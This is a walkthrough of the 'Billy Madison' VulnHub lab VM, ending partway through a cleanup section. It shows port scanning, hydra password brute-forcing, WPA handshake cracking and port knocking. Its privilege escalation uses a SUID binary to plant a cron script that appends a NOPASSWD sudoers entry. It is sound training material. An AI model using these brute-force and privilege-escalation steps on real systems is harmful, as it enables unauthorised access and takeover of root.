Billy Madison: 1.1 VulnHub Writeup

  1. Service discovery
  2. Port 23 - telnet?
  3. Port 69 - old school Wordpress
  4. Port 80 - Uh oh..
  5. Ports 139 and 445 - do the samba
  6. Port 2525 - smtp
  7. Port 69 - "Wordpress"
  8. Port 80
  9. Checking out the capture
  10. Nobody expects the spanish..armarda?
  11. Eric is a very naughty boy
  12. Veronica
  13. Eric's backdoor
  14. Cleanup duty
  15. Lost document
  16. Summary

The VM of today is Billy Madison: 1.1 by Brian Johnson. This gun' be good.

Service discovery

Now that we've got access to the target, let's fire off an nmap scan.

root@kali:~# nmap -T4 -A -v -p0-65535

Starting Nmap 7.25BETA1 ( ) at 2016-09-10 23:33 EDT
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:33
Completed NSE at 23:33, 0.00s elapsed
Initiating NSE at 23:33
Completed NSE at 23:33, 0.00s elapsed
Initiating ARP Ping Scan at 23:33
Scanning [1 port]
Completed ARP Ping Scan at 23:33, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:33
Completed Parallel DNS resolution of 1 host. at 23:33, 0.05s elapsed
Initiating SYN Stealth Scan at 23:33
Scanning [65536 ports]
Discovered open port 22/tcp on
Discovered open port 445/tcp on
Discovered open port 80/tcp on
Discovered open port 139/tcp on
Discovered open port 23/tcp on
SYN Stealth Scan Timing: About 23.09% done; ETC: 23:35 (0:01:43 remaining)
Discovered open port 69/tcp on
SYN Stealth Scan Timing: About 58.55% done; ETC: 23:34 (0:00:43 remaining)
Discovered open port 2525/tcp on
Completed SYN Stealth Scan at 23:34, 88.71s elapsed (65536 total ports)
Initiating Service scan at 23:34
Scanning 7 services on
Completed Service scan at 23:34, 23.53s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against
WARNING: RST from port 23 -- is this port really open?
WARNING: RST from port 23 -- is this port really open?
WARNING: RST from port 23 -- is this port really open?
WARNING: RST from port 23 -- is this port really open?
WARNING: RST from port 23 -- is this port really open?
WARNING: RST from port 23 -- is this port really open?
NSE: Script scanning
Initiating NSE at 23:34
Completed NSE at 23:35, 40.46s elapsed
Initiating NSE at 23:35
Completed NSE at 23:35, 0.01s elapsed
Nmap scan report for
Host is up (0.00035s latency).
Not shown: 65527 filtered ports
22/tcp   open   tcpwrapped
23/tcp   open   telnet?
69/tcp   open   http        BaseHTTPServer
|_http-generator: WordPress 1.0
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: MadisonHotelsWordpress
|_http-title: Welcome | Just another WordPress site
80/tcp   open   http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Oh nooooooo!
137/tcp  closed netbios-ns
138/tcp  closed netbios-dgm
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
2525/tcp open   smtp
| smtp-commands: BM, 8BITMIME, AUTH LOGIN, Ok,
|_ SubEthaSMTP null on BM Topics: HELP HELO RCPT MAIL DATA AUTH EHLO NOOP RSET VRFY QUIT STARTTLS For more info use "HELP <topic>". End of HELP info
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at :
MAC Address: 08:00:27:DC:FA:D8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: OpenBSD 4.X
OS CPE: cpe:/o:openbsd:openbsd:4.4
OS details: OpenBSD 4.4
Network Distance: 1 hop

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: bm
|   NetBIOS computer name: BM
|   Domain name:
|   FQDN: bm
|_  System time: 2016-09-10T22:35:01-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

1   0.35 ms

NSE: Script Post-scanning.
Initiating NSE at 23:35
Completed NSE at 23:35, 0.00s elapsed
Initiating NSE at 23:35
Completed NSE at 23:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 155.31 seconds
           Raw packets sent: 131164 (5.774MB) | Rcvd: 146 (15.868KB)

Well, there's no lack of attack surface here. Let's start with what we know.

Firstly I tried connecting via ssh - no luck there. After a couple of attempts (and a check with ncat - no data received, and closes connection after two newlines sent) I check out port 23 - supposedly telnet.

Port 23 - telnet?

root@kali:~# ncat -v 23
Ncat: Version 7.25BETA1 ( )
Ncat: Connected to

***** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****

Uh, ok..

root@kali:~# ncat -v 23
Ncat: Version 7.25BETA1 ( )
Ncat: Connection refused.

Yep, we've been banned from connecting to port 23 now. In the original message, we're given the hint that ROT passwords were used in the past, and then are given an example of rkfpuzrahngvat.

After putting the phrase in to a Caesar Cipher tool, we find the top match with a rotation of 13, equal to EXSCHMENUATING. This is another reference to Billy Madison, as shown in this short video. I add it to my wordlist for later.

Port 69 - old school Wordpress

nmap is reporting port 69 as hosting a http server, powered by none other than Wordpress 1.0. I have to see this.

Look at it - it's beautiful.

I'm not even sure if wpscan will run against such an old verison, but let's try.

root@kali:~# wpscan --url
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.1
          Sponsored by Sucuri -
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_

The plugins directory 'wp-content/plugins' does not exist.
You can specify one per command line option (don't forget to include the wp-content directory if needed)
[?] Continue? [Y]es [N]o, default: [N]
[+] URL:
[+] Started: Sat Sep 10 23:56:29 2016

[!] The WordPress '' file exists exposing a version number
[+] Interesting header: SERVER: MadisonHotelsWordpress
[+] XML-RPC Interface available under:

[+] WordPress version 1.0 identified from meta generator (Released on 2004-01-03)

[+] WordPress theme in use: twentyeleven

[+] Name: twentyeleven
 |  Latest version: 2.5
 |  Location:
 |  Readme:
 |  Changelog:
 |  Style URL:
 |  Referenced style.css:

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Sat Sep 10 23:56:29 2016
[+] Requests Done: 59
[+] Memory used: 15.312 MB
[+] Elapsed time: 00:00:00

Yeah, didn't think so. It did highlight an interesting server header value though - MadisonHotelsWordpress. Enumerating the users (by visiting /?author=1, /?author=2, etc), we find there's only a single user named admin.

After a little time spent attempting to bruteforce or guess the password for the admin user, I cut my losses and move on to port 80.

Port 80 - Uh oh..

Upon visiting port 80, we're met with a taunting message.

The message (excluding images) in full reads as following.


Silly Billy!!!

If you're reading this, you clicked on the link I sent you. OH NOES! Your computer's all locked up, and now you can't get access to your final 12th grade assignment you've been working so hard on! You need that to graduate, Billy Boy!!

Now all I have to do is sit and wait for a while and...


I bet this is you right now:

Think you can get your computer unlocked and recover your final paper before time runs out and you FAAAAIIIILLLLL?????

Good luck, schmuck.

Nothing hidden in the page, or the headers. I grab the images and check them, just to be sure.. nothing.

I run dirsearch, and get a few hits.

root@kali:~/dirsearch# python3 -u -e php

 _|. _ _  _  _  _ _|_    v0.3.6
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 5147

Error Log: /root/dirsearch/logs/errors-16-09-11_00-16-01.log


[00:16:01] Starting:
[00:16:01] 403 -  294B  - /.hta
[00:16:01] 403 -  305B  - /.htaccess-local
[00:16:01] 403 -  301B  - /.ht_wsr.txt
[00:16:01] 403 -  303B  - /.htaccess-dev
[00:16:01] 403 -  303B  - /.htaccess.BAK
[00:16:01] 403 -  305B  - /.htaccess-marco
[00:16:01] 403 -  303B  - /.htaccess.old
[00:16:01] 403 -  303B  - /.htaccess.txt
[00:16:01] 403 -  306B  - /.htaccess.sample
[00:16:01] 403 -  304B  - /
[00:16:01] 403 -  304B  - /.htaccess.bak1
[00:16:01] 403 -  304B  - /.htaccess.orig
[00:16:01] 403 -  302B  - /.htaccessBAK
[00:16:01] 403 -  304B  - /.htaccess_orig
[00:16:01] 403 -  302B  - /.htaccess_sc
[00:16:01] 403 -  305B  - /.htaccess_extra
[00:16:01] 403 -  298B  - /.htgroup
[00:16:01] 403 -  300B  - /.htaccess~
[00:16:01] 403 -  303B  - /.htaccessOLD2
[00:16:01] 403 -  303B  - /.htpasswd-old
[00:16:01] 403 -  302B  - /.htaccessOLD
[00:16:01] 403 -  300B  - /.htpasswds
[00:16:01] 403 -  304B  - /.htpasswd_test
[00:16:01] 403 -  298B  - /.htusers
[00:16:10] 200 -  937B  - /index.php
[00:16:10] 200 -  937B  - /index.php/login/
[00:16:11] 301 -  319B  - /manual  ->
[00:16:11] 200 -  626B  - /manual/index.html
[00:16:13] 403 -  304B  - /server-status/
[00:16:13] 403 -  303B  - /server-status

Task Completed

Nothing of real use here either unfortunately.

Next on our list is samba, running on ports 139 and 445.

Ports 139 and 445 - do the samba

Firstly, we check to see if there are any shares available on the target.

root@kali:~# smbclient -L
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

    Sharename       Type      Comment
    ---------       ----      -------
    EricsSecretStuff Disk      
    IPC$            IPC       IPC Service (BM)
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

    Server               Comment
    ---------            -------
    BM                   BM

    Workgroup            Master
    ---------            -------
    WORKGROUP            BM

Great - let's see if we can connect.

root@kali:~# smbclient //
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Sat Sep 10 23:27:10 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       35  Sat Sep 10 23:27:10 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

        30291996 blocks of size 1024. 25800892 blocks available
smb: \>

Ok, next let's grab everything we can. I also check to see if we have write access - nope.

smb: \> get ebd.txt
getting file \ebd.txt of size 35 as ebd.txt (8.5 KiloBytes/sec) (average 8.5 KiloBytes/sec)
smb: \> get .DS_Store
getting file \.DS_Store of size 6148 as .DS_Store (1500.9 KiloBytes/sec) (average 754.8 KiloBytes/sec)
smb: \> get ._.DS_Store
getting file \._.DS_Store of size 4096 as ._.DS_Store (1000.0 KiloBytes/sec) (average 836.5 KiloBytes/sec)
smb: \> put test.txt
NT_STATUS_ACCESS_DENIED opening remote file \test.txt

The content of the file ebd.txt tells us that there may be some sort of backdoor on the system, but doesn't tell us much else.

root@kali:~# cat ebd.txt
Erics backdoor is currently CLOSED

Last stop - smtp on port 2525.

Port 2525 - smtp

Not much to talk about here. The server appears to run a Java implementation of smtp named SubEthaSMTP. I couldn't get the server to respond, and cannot find any mention of vulnerabilities.

Time to loop back round.

Port 69 - "Wordpress"

After looking at port 69 again, I start to think that this isn't actually Wordpress, but a static site mocked up to look and act like Wordpress (a honeypot). I spend a bit more time attempting to get some more legitimate responses, as well as running my wordlist against it, before deciding this can go on back burner. It just feels too much like a honeypot.

Port 80

I run my very limited wordlist against port 80, and come out with a new hit - /exschmenuating/!

So, we've got a bit of a log of what the attacker has been doing to ruin Billy Madison's life.

"Ruin Billy Madison's Life" - Eric's notes

Looks like Principal Max is too much of a goodie two-shoes to help me ruin Billy Boy's life. Will ponder other victims.
Ah! Genius thought! Billy's girlfriend Veronica uses his machine too. I might have to cook up a phish and see if I can't get her to take the bait.
OMg LOL LOL LOL!!! What a twit - I can't believe she fell for it!! I .captured the whole thing in this folder for later lulz. I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks! Anyway, malware installation successful. I'm now in complete control of Bill's machine!

The last entry suggests that there's a capture file of some sort in the directory, with the word veronica in the filename. As I've had a good deal of success with the rockyou wordlist on bruteforcing recently, I decide to grep it for all words containing the name veronica. I then run this through dirbuster with the extensions of capture, pcap and cap.

After a while, we get a hit for a single file - 012987veronica.cap.


This is a pcap file, so I use Wireshark to open it up and investigate.

Checking out the capture

Within the capture are a number of emails that have been sent via port 2525 on the target. The emails read as follows.

EHLO kali
Date: Sat, 20 Aug 2016 21:56:50 -0500
X-Mailer: swaks v20130209.0

Hey Veronica,

Eric Gordon here.  

I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users.  Just <a href="">click here</a> to install it, k?  

Thanks. -Eric


EHLO kali
Date: Sat, 20 Aug 2016 21:57:00 -0500
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0


Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.



EHLO kali
Date: Sat, 20 Aug 2016 21:57:11 -0500
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0


Thanks that will be perfect.  Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."



EHLO kali
Date: Sat, 20 Aug 2016 21:57:21 -0500
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0





EHLO kali
Date: Sat, 20 Aug 2016 21:57:31 -0500
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0


Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that.  Thanks!



EHLO kali
Date: Sat, 20 Aug 2016 21:57:41 -0500
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0


I clicked the link and now this computer is acting really weird.  The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff.  I'm going to send this email to you and then shut the computer down.  I have some important files I'm worried about, and Billy's working on his big 12th grade final.  I don't want anything to happen to that!



Nobody expects the spanish..armarda?

So we've apparently got a login for an FTP server, but the FTP server will only run when someone sends the "Spanish Armada" combo. I look through the script for Billy Madison, and find the following exerpt.

Spanish Armada.
'67? 1469?
1981? 1986?

This sounds like a port knocking sequence to me. I try knocking with the sequence of 1466, 67, 1469, 1514, 1981 and 1986.

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x; done

Then I try to connect on port 21 for ftp.

root@kali:~# ftp
Connected to
220 Welcome to ColoradoFTP - the open source FTP server (
Name ( eric
331 User name okay, need password.
230 User logged in, proceed.
Remote system type is UNIX.

Great stuff!

Eric is a very naughty boy

Let's check out what's available to us.

ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 9132 Aug 20 12:49 40054
-rwxrwxrwx 1 ftp 868 Sep 01 10:42 .notes
-rwxrwxrwx 1 ftp 6326 Aug 20 12:49 40049
-rwxrwxrwx 1 ftp 5367 Aug 20 12:49 39772
-rwxrwxrwx 1 ftp 5208 Aug 20 12:49 39773
-rwxrwxrwx 1 ftp 1287 Aug 20 12:49 9129
226 Transfer completed.

I download all of these files and start digging.

First of all I check out the content of the .notes file.

root@kali:~# cat .notes
Ugh, this is frustrating.  

I managed to make a system account for myself. I also managed to hide Billy's paper
where he'll never find it.  However, now I can't find it either :-(.
To make matters worse, my privesc exploits aren't working.  
One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it)
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  
All I need to do is send an email that includes
the text: "My kid will be a ________ _________"


The new secret port will be open and then I can login from there with my wifi password, which I'm
sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to
check Veronica's.


Before I move on, I note that the ftp server allows anonymous login. I login, and find Billys final project document.

root@kali:~# ftp
Connected to
220 Welcome to ColoradoFTP - the open source FTP server (
Name ( anonymous
331 Guest login okay, send your complete e-mail address as password.
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 141 Aug 15 09:19 Billys-12th-grade-final-project.doc
226 Transfer completed.
ftp> get Billys-12th-grade-final-project.doc
local: Billys-12th-grade-final-project.doc remote: Billys-12th-grade-final-project.doc
200 PORT command successful.
150 Opening A mode data connection for Billys-12th-grade-final-project.doc.
226 Transfer completed for "Billys-12th-grade-final-project.doc".
145 bytes received in 0.25 secs (0.5690 kB/s)
ftp> quit
221 Logged out, closing control connection.
root@kali:~# cat Billys-12th-grade-final-project.doc
out by the pool for another hour!


Moving on..So apparently there's a backdoor on the target. We can enable the backdoor by sending an email with a certain phrase. After watching the linked YouTube video I reckon this phrase is My kid will be a soccer player. I send an email with the phrase using swaks.

root@kali:~# swaks --to --from --server --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player"
=== Trying
=== Connected to
<-  220 BM ESMTP SubEthaSMTP null
 -> EHLO kali
<-  250-BM
<-  250-8BITMIME
<-  250-AUTH LOGIN
<-  250 Ok
 -> MAIL FROM:<>
<-  250 Ok
 -> RCPT TO:<>
<-  250 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Thu, 15 Sep 2016 07:57:56 -0400
 -> To:
 -> From:
 -> Subject: My kid will be a soccer player
 -> X-Mailer: swaks v20130209.0
 -> My kid will be a soccer player
 -> .
<-  250 Ok
 -> QUIT
<-  221 Bye
=== Connection closed with remote host.

I then perform another nmap scan. Sure enough, we find a new port open.

1974/tcp open   ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f2:02:a4:3b:8f:84:a2:fd:28:53:e5:2d:a2:63:90:48 (RSA)
|_  256 31:60:85:b5:93:da:92:9e:90:a2:d0:a7:c4:51:42:8e (ECDSA)

Next we need to get hold of the wifi password. There's a hint that points us towards Veronica's ftp folder. We don't have a login for her.. damn. I run hydra against the veronica user using our wordlist generated earlier from the rockyou wordlist.

root@kali:~# hydra -t 10 -l veronica -P billy-rockyou.list ftp
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2016-09-15 08:19:26
[DATA] max 10 tasks per 1 server, overall 64 tasks, 773 login tries (l:1/p:773), ~1 try per task
[DATA] attacking service ftp on port 21
[21][ftp] host:   login: veronica   password:
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2016-09-15 08:19:54



Let's login and grab what we can.

root@kali:~# ftp
Connected to
220 Welcome to ColoradoFTP - the open source FTP server (
Name ( veronica
331 User name okay, need password.
230 User logged in, proceed.
Remote system type is UNIX.
ftp> binary
200 Type set to I
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 719128 Aug 17 12:16 eg-01.cap
-rwxrwxrwx 1 ftp 595 Aug 20 12:55 email-from-billy.eml
226 Transfer completed.
ftp> get eg-01.cap
local: eg-01.cap remote: eg-01.cap
200 PORT command successful.
150 Opening I mode data connection for eg-01.cap.
226 Transfer completed for "eg-01.cap".
719128 bytes received in 0.69 secs (1012.8116 kB/s)
ftp> get email-from-billy.eml
local: email-from-billy.eml remote: email-from-billy.eml
200 PORT command successful.
150 Opening I mode data connection for email-from-billy.eml.
226 Transfer completed for "email-from-billy.eml".
595 bytes received in 0.53 secs (1.0980 kB/s)
ftp> quit
221 Logged out, closing control connection.

Let's have a dig through what we've got.

root@kali:~# cat email-from-billy.eml
        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0
Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. :-)



Damn, so no password yet, but we do have another .cap file. After opening the file in wireshark, it looks like we have a capture of some wifi traffic, so I immediately pass it on to aircrack-ng with the rockyou wordlist to chomp away at.

root@kali:~# aircrack-ng eg-01.cap -w dirsearchtmp/rockyou.txt
Opening eg-01.cap
Read 13003 packets.

   #  BSSID              ESSID                     Encryption

   1  02:13:37:A5:52:2E  EricGordon                WPA (1 handshake)

Choosing first network as target.

Opening eg-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc4

      [00:10:41] 1699616/9822769 keys tested (3266.99 k/s)

      Time left: 41 minutes, 27 seconds                         17.30%

                           KEY FOUND! [ triscuit* ]

      Master Key     : 9E 8B 4F E6 CC 5E E2 4C 46 84 D2 AF 59 4B 21 6D
                       B5 3B 52 84 04 9D D8 D8 83 67 AF 43 DC 60 CE 92

      Transient Key  : 7A FA 82 59 5A 9A 23 6E 8C FB 1D 4B 4D 47 BE 13
                       D7 AC AC 4C 81 0F B5 A2 EE 2D 9F CC 8F 05 D2 82
                       BF F4 4E AE 4E C9 ED EA 31 37 1E E7 29 10 13 92
                       BB 87 8A AE 70 95 F8 62 20 B5 2B 53 8D 0C 5C DC

      EAPOL HMAC     : 86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33

And there we go - the network name is EricGordon, and the password was triscuit*. I attempt to login to ssh on port 1974 with the username EricGordon, but have no success. After a few attempts, I try the username eric, and we get in.

root@kali:~# ssh -p 1974 eric@
eric@'s password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-36-generic x86_64)

 * Documentation:
 * Management:
 * Support:

37 packages can be updated.
0 updates are security updates.

Last login: Sat Aug 20 22:28:28 2016 from

Great success!

Eric's backdoor

Let's see what we have available to us in eric's home directory.

eric@BM:~$ ls -lah
total 532K
drwxr-xr-x 3 eric eric 4.0K Aug 23 00:18 .
drwxr-xr-x 6 root root 4.0K Aug 20 13:56 ..
-rw-r--r-- 1 eric eric  220 Aug 20 13:56 .bash_logout
-rw-r--r-- 1 eric eric 3.7K Aug 20 13:56 .bashrc
drwx------ 2 eric eric 4.0K Aug 20 14:07 .cache
-rw-r--r-- 1 root root 441K Aug  7 22:31 eric-tongue-animated.gif
-rw-r--r-- 1 root root  60K Aug  7 22:29 eric-unimpressed.jpg
-rw-r--r-- 1 eric eric  655 Aug 20 13:56 .profile
-rw-r--r-- 1 root root  115 Aug 20 20:41 why-1974.txt
eric@BM:~$ cat why-1974.txt
Why 1974?  Because:

I check out both images, but nothing of interest comes out of them.

Time to try and elevate.

After some digging around, and based off of previous findings, it looks like eric originally used one of a number of exploits to elevate to root. None of these exploits appear to work anymore, however an interesting suid file was discovered.

eric@BM:~$ find / -user root -perm -4000 -ls 2>/dev/null
  1454477    368 -r-sr-s---   1 root     eric       372922 Aug 20 22:35 /usr/local/share/sgml/donpcgd
  1048829    136 -rwsr-xr-x   1 root     root       136808 May  4 12:25 /usr/bin/sudo
  1058216     24 -rwsr-xr-x   1 root     root        23376 Jan 17  2016 /usr/bin/pkexec
  1048745     56 -rwsr-xr-x   1 root     root        54256 Mar 29 04:25 /usr/bin/passwd
  1057557     36 -rwsr-xr-x   1 root     root        32944 Mar 29 04:25 /usr/bin/newgidmap
  1048609     40 -rwsr-xr-x   1 root     root        40432 Mar 29 04:25 /usr/bin/chsh
  1048670     76 -rwsr-xr-x   1 root     root        75304 Mar 29 04:25 /usr/bin/gpasswd
  1057558     36 -rwsr-xr-x   1 root     root        32944 Mar 29 04:25 /usr/bin/newuidmap
  1048734     40 -rwsr-xr-x   1 root     root        39904 Mar 29 04:25 /usr/bin/newgrp
  1048607     52 -rwsr-xr-x   1 root     root        49584 Mar 29 04:25 /usr/bin/chfn
  1058246     24 -rwsr-xr-x   1 root     root        23288 Apr 29 11:02 /usr/bin/ubuntu-core-launcher
  1048930     12 -rwsr-xr-x   1 root     root        10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
  1057498     40 -rwsr-xr-x   1 root     root        38984 Jun 30 02:28 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
  1318420     16 -rwsr-xr-x   1 root     root        14864 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
  1066069    420 -rwsr-xr-x   1 root     root       428240 Aug 11 11:25 /usr/lib/openssh/ssh-keysign
  1056767     44 -rwsr-xr--   1 root     messagebus    42992 Apr  1 11:41 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  1179709     40 -rwsr-xr-x   1 root     root          40152 May 26 18:31 /bin/mount
  1179740     40 -rwsr-xr-x   1 root     root          40128 Mar 29 04:25 /bin/su
  1179758     28 -rwsr-xr-x   1 root     root          27608 May 26 18:31 /bin/umount
  1190647     32 -rwsr-xr-x   1 root     root          30800 Mar 11  2016 /bin/fusermount
  1179724     44 -rwsr-xr-x   1 root     root          44680 May  7  2014 /bin/ping6
  1179723     44 -rwsr-xr-x   1 root     root          44168 May  7  2014 /bin/ping
  1190681    140 -rwsr-xr-x   1 root     root         142032 Feb 17  2016 /bin/ntfs-3g

The /usr/local/share/sgml/donpcgd binary runs as root. If we run the binary, it prompts for two paths.

eric@BM:~$ /usr/local/share/sgml/donpcgd
Usage: /usr/local/share/sgml/donpcgd path1 path2

If we provide two paths, a file gets created at the second path that is writable by eric. We can create files in any location, as demonstrated below.

eric@BM:~$ /usr/local/share/sgml/donpcgd /dev/null /etc/testing
#### mknod(/etc/testing,21b6,103)
eric@BM:~$ ls -lah /etc/testing
crw-rw-rw- 1 root root 1, 3 Sep 15 10:22 /etc/testing

I attempt to exploit this by creating a cron.hourly entry, which will add the eric user as a sudoer.

eric@BM:~$ touch /tmp/test
eric@BM:~$ /usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test
#### mknod(/etc/cron.hourly/test,81b4,0)
eric@BM:~$ echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test
eric@BM:~$ chmod +x /etc/cron.hourly/test
eric@BM:~$ cat /etc/cron.hourly/test
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

Now, I wait..

..after an hour or so, I check to see if I can sudo.

eric@BM:~$ sudo su
root@BM:/home/eric# id
uid=0(root) gid=0(root) groups=0(root)


root@BM:/home/eric# cd
root@BM:~# ls -lah
total 92K
drwx------  8 root root 4.0K Sep 15 11:02 .
drwxr-xr-x 25 root root 4.0K Aug 30 01:15 ..
-rw-------  1 root root   26 Sep 15 11:01 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwx------  3 root root 4.0K Aug 11 22:30 .cache
drwxr-xr-x  2 root root 4.0K Aug 22 21:24 checkban
-rwxr-xr-x  1 root root  112 Aug 21 22:11
-rwxr-xr-x  1 root root   59 Aug 21 22:12
-rw-r--r--  1 root root   35 Aug 21 16:51 ebd.txt
-rwxr-xr-x  1 root root  102 Aug 20 12:45
-rwxr-xr-x  1 root root   63 Aug 19 17:26
-rwxr-xr-x  1 root root 1020 Aug 20 14:00
drwx------  2 root root 4.0K Aug 21 15:58 .gnupg
drwxr-xr-x  3 root root 4.0K Aug 12 22:53 .m2
drwxr-xr-x  2 root root 4.0K Aug 11 22:17 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Aug 15 10:16 .selected_editor
drwxr-xr-x  2 root root 4.0K Aug 22 21:19 ssh
-rwxr-xr-x  1 root root   33 Aug 11 22:51
-rwxr-xr-x  1 root root   69 Aug 15 20:54
-rwxr-xr-x  1 root root  122 Aug 17 22:55
-rw-r--r--  1 root root  222 Aug 20 21:58 .wget-hsts
-rwxr-xr-x  1 root root  230 Aug 16 17:08

So, that's not the end of the story. In order to consider this VM as complete, we need to undo the changes made by eric, and to find billy's paper. eric has hidden the paper, and he's forgotten where he's hidden it. Great.

Cleanup duty

So, what has eric done.

ssh backdoor

eric has setup a backdoor, in the form of an ssh server that only comes up once an email is received with a specific phrase. We firstly should remove the cron entry that watches out for this phrase, by removing line 25 from the root user's crontab.

*/1 * * * * /root/ssh/

This script will check to see if the phrase has been received in an email, and open up access to the ssh server when it's found.

root@BM:~# cat ssh/
NOW=$(date +"%Y-%m-%d-%H-%M-%S")
if grep -w "My kid will be a soccer player" /home/WeaselLaugh/*; then
   sudo iptables -A INPUT -p tcp --dport 1974 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
   echo $NOW > /home/WeaselLaugh/ebd.txt
   echo Erics backdoor is currently OPEN >> /home/WeaselLaugh/ebd.txt

Next we should disable this service completely. Which service is responsible?

root@BM:~# netstat -tulpn | grep 1974
tcp        0      0  *               LISTEN      2629/sshd       
tcp6       0      0 :::1974                 :::*                    LISTEN      2629/sshd

Fair enough - we should disable ssh until we can clean up the system by removing malicious users.

root@BM:~# update-rc.d ssh disable
insserv: warning: current start runlevel(s) (empty) of script `ssh' overrides LSB defaults (2 3 4 5).
insserv: warning: current stop runlevel(s) (2 3 4 5) of script `ssh' overrides LSB defaults (empty).

When we're done, we should also terminate the service with service ssh stop - ensuring we retain access by some other method.

We should proceed to remove the malicious eric user from the target.

root@BM:~# userdel eric

We don't provide the -r flag, so eric's home directory and spool are preserved. We should retrieve and subsequently remove these by hand.

Interesting binary

